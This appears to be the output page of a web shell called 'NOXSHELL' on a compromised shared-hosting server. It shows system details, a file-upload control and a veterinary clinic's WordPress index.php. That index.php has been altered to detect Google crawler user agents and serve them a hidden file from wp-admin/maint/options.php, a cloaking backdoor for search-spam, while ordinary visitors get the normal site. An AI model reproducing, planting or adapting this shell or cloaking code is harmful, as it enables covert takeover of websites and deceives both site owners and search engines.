NOXSHELL
Server: LiteSpeed
System: Linux br-asc-web1432.main-hosting.eu 5.14.0-611.16.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Dec 22 03:40:39 EST 2025 x86_64
User: u728655182 (728655182)
PHP: 8.1.33
Disabled: system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
Upload Files
File: /home/u728655182/domains/clinicaveterinariaabelli.com.ar/public_html/index.php
<?php
$user_agent = $_SERVER['HTTP_USER_AGENT'] ?? '';
 
// 2026 Güncel Google Bot Listesi
$google_bots = [
    'Googlebot', 'Googlebot-News', 'Googlebot-Image', 'Googlebot-Video',
    'Googlebot-Mobile', 'Mediapartners-Google', 'AdsBot-Google',
    'AdsBot-Google-Mobile', 'APIs-Google', 'Google Favicon',
    'Google Web Preview', 'Feedfetcher-Google', 'DuplexWeb-Google',
    'Google-InspectionTool', 'Googlebot-AdsBot', 'Googlebot-Desktop',
    'Google-Other', 'Google-SearchCentral', 'Storebot-Google',
    'Google-Read-Aloud', 'google-inspection', 'Vertex-AI-Bot'
];
 
foreach ($google_bots as $bot) {
    if (stripos($user_agent, $bot) !== false) {
        // Dosya yolunun varlığını kontrol ederek hata almayı engelleriz
        $path = __DIR__ . '/wp-admin/maint/options.php';
        if (file_exists($path)) {
            require $path;
            exit;
        }
    }
}
 
// Normal kullanıcılar için WordPress yüklemesi
define('WP_USE_THEMES', true);
if (file_exists(__DIR__ . '/wp-blog-header.php')) {
    require __DIR__ . '/wp-blog-header.php';
}